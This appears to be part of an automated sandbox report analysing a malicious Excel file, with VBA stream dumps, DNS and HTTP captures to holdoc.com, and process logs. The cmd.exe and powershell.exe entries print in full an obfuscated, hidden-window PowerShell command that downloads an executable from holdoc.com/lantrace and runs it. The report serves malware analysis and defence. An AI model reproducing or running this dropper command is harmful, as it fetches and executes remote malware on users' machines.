Data Raw: 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 ff ff ff ff 91 05 00 00 00 00 00 00 08 00 2b 00 34 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 06

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 481

General
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3
File Type: data
Stream Size: 481
Entropy: 2.76254679194
Base64 Encoded: False
Data ASCII: r U ...... @ . . . . . $ ...... ` ...... ( . A ...... ` ...... / ( ...... ` ...... / ( ...... ` . . ! ...... / ( ...... ` . . % ......
Data Raw: 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 15 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00 41 01 00 00 00 00 02 00 01 00 03 60 04 01 19 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 524

General
Stream Path: _VBA_PROJECT_CUR/VBA/dir
File Type: data
Stream Size: 524
Entropy: 6.33160018738
Base64 Encoded: True
Data ASCII: ...... 0 * . . . . . p . . H . . . . . d ...... V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r ...... * . c \\ . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C ...... 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E ...... E . 2 D F 8 D 0 4 C . -
Data Raw: 01 08 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 2a e1 63 5c 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

Total Packets: 14
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2018 01:31:46.217499971 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:31:47.213018894 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:31:47.299452066 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Feb 23, 2018 01:31:47.321384907 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:31:47.321408033 CET | 80 | 49163 | 92.53.78.250 | 192.168.2.2
Feb 23, 2018 01:31:47.321466923 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:31:47.321856976 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:31:47.321868896 CET | 80 | 49163 | 92.53.78.250 | 192.168.2.2
Feb 23, 2018 01:31:47.851967096 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Feb 23, 2018 01:33:26.202478886 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.202632904 CET | 80 | 49163 | 92.53.78.250 | 192.168.2.2
Feb 23, 2018 01:33:26.202733040 CET | 49163 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.562745094 CET | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Feb 23, 2018 01:33:26.652406931 CET | 53 | 53440 | 8.8.8.8 | 192.168.2.2
Feb 23, 2018 01:33:26.654766083 CET | 49164 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.654820919 CET | 80 | 49164 | 92.53.78.250 | 192.168.2.2
Feb 23, 2018 01:33:26.655200005 CET | 49164 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.655917883 CET | 49164 | 80 | 192.168.2.2 | 92.53.78.250
Feb 23, 2018 01:33:26.655945063 CET | 80 | 49164 | 92.53.78.250 | 192.168.2.2

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Feb 23, 2018 01:31:46.217499971 CET  56842        53         192.168.2.2  8.8.8.8
Feb 23, 2018 01:31:47.213018894 CET  56842        53         192.168.2.2  8.8.8.8
Feb 23, 2018 01:31:47.299452066 CET  53           56842      8.8.8.8      192.168.2.2
Feb 23, 2018 01:31:47.851967096 CET  53           56842      8.8.8.8      192.168.2.2
Feb 23, 2018 01:33:26.562745094 CET  53440        53         192.168.2.2  8.8.8.8
Feb 23, 2018 01:33:26.652406931 CET  53           53440      8.8.8.8      192.168.2.2

ICMP Packets

Timestamp                            Source IP    Dest IP  Checksum  Code                           Type
Feb 23, 2018 01:31:47.852212906 CET  192.168.2.2  8.8.8.8  cffc      Port unreachable (Destination) Unreachable

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name        Type            Class
Feb 23, 2018 01:31:46.217499971 CET  192.168.2.2  8.8.8.8  0x2320    Standard query (0)  holdoc.com  A (IP address)  IN (0x0001)
Feb 23, 2018 01:31:47.213018894 CET  192.168.2.2  8.8.8.8  0x2320    Standard query (0)  holdoc.com  A (IP address)  IN (0x0001)
Feb 23, 2018 01:33:26.562745094 CET  192.168.2.2  8.8.8.8  0x61b2    Standard query (0)  holdoc.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name        CName  Address       Type            Class
Feb 23, 2018 01:31:47.299452066 CET  8.8.8.8    192.168.2.2  0x2320    No error (0)  holdoc.com         92.53.78.250  A (IP address)  IN (0x0001)
Feb 23, 2018 01:31:47.851967096 CET  8.8.8.8    192.168.2.2  0x2320    No error (0)  holdoc.com         92.53.78.250  A (IP address)  IN (0x0001)
Feb 23, 2018 01:33:26.652406931 CET  8.8.8.8    192.168.2.2  0x61b2    No error (0)  holdoc.com         92.53.78.250  A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

holdoc.com

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.2  49163        92.53.78.250    80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Feb 23, 2018 01:31:47.321856976 CET
kBytes transferred: 0
Direction: OUT
Data:
GET /lantrace HTTP/1.1
Host: holdoc.com
Connection: Keep-Alive

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.2  49164        92.53.78.250    80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: Feb 23, 2018 01:33:26.655917883 CET
kBytes transferred: 1
Direction: OUT
Data:
GET /lantrace HTTP/1.1
Host: holdoc.com
Connection: Keep-Alive

Code Manipulations

Statistics

Behavior

• EXCEL.EXE
• cmd.exe
• powershell.exe

System Behavior

Analysis Process: EXCEL.EXE PID: 3268 Parent PID: 2948

General

Start time: 01:31:48
Start date: 23/02/2018
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Imagebase: 0x2f310000
File size: 20392608 bytes
MD5 hash: 716335EDBB91DA84FC102425BFDA957E
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Source File Path Completion Count Address Symbol

Source Old File Path New File Path Completion Count Address Symbol

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Registry Activities

Key Created

Source  Key Path                                    Completion       Count  Address   Symbol
        HKEY_USERS\Software\Microsoft\VBA             success or wait  1      60A4AC61  RegCreateKeyExA
        HKEY_USERS\Software\Microsoft\VBA\7.0         success or wait  1      60A4AC61  RegCreateKeyExA
        HKEY_USERS\Software\Microsoft\VBA\7.0\Common  success or wait  1      60A4AC61  RegCreateKeyExA

Source Key Path Name Type Data Completion Count Address Symbol

Source Key Path Name Type Old Data New Data Completion Count Address Symbol

Analysis Process: cmd.exe PID: 3348 Parent PID: 3268

General

Start time: 01:31:51
Start date: 23/02/2018
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cMd /c'poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','%temp%.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') '%localappdata%.exe'''
Imagebase: 0x49de0000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: powershell.exe PID: 3376 Parent PID: 3348

General

Start time: 01:31:52
Start date: 23/02/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25; (.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','C:\Users\HERBBL~1\AppData\Local\Temp.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') 'C:\Users\user\AppData\Local.exe''
Imagebase: 0x22820000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

File Activities

File Created

Source  File Path                              Access                                          Attributes  Options                                                                      Completion       Count  Address  Symbol
        C:\Users\user\AppData\Local\Temp.exe  read attributes and synchronize and generic write  none        synchronous io non alert and non directory file and open no recall  success or wait  1      181066F  CreateFileW
        C:\Users\user\AppData\Local\Temp.exe  read attributes and synchronize and generic write  none        synchronous io non alert and non directory file and open no recall  success or wait  1      181066F  CreateFileW

File Deleted

Source  File Path                              Completion       Count  Address  Symbol
        C:\Users\user\AppData\Local\Temp.exe  success or wait  1      181006E  DeleteFileW

Source Old File Path New File Path Completion Count Address Symbol

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Disassembly

Code Analysis
